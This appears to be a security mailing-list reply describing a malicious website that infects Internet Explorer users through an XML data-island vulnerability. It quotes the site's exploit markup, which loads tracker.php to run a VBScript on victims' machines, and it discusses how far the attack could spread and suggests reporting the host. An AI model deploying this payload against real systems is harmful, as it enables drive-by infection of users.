Hi Mark, www.Haxr.org uses the "XML Page Object Type Validation Vulnerability" [1] to infect IE users automatically. Here is the code from the site: <span datasrc="#oExec" datafld="counter" dataformatas="html"></span> <xml id="oExec"> <security> <counter> <![CDATA[ <object data=tracker.php></object> ]]> </counter> </security> </xml> This is almost an exact copy of the PoC exploit posted for this vuln. tracker.php points to the exec.vbs script that you posted. This finally gets executed on the victim machine and does its stuff. >If this is new, its going to spread like wildfire. It will infect many machines but IMO, it wouldn't exactly spread like "wildfire" 'coz it has a "single point of failure". Have you considered complaining to the hosting service of www.haxr.org? -- Regards, S.G.Masood Hyderabad, India -- __________________________________ Do you Yahoo!? Yahoo! SiteBuilder - Free, easy-to-use web site design software http://sitebuilder.yahoo.com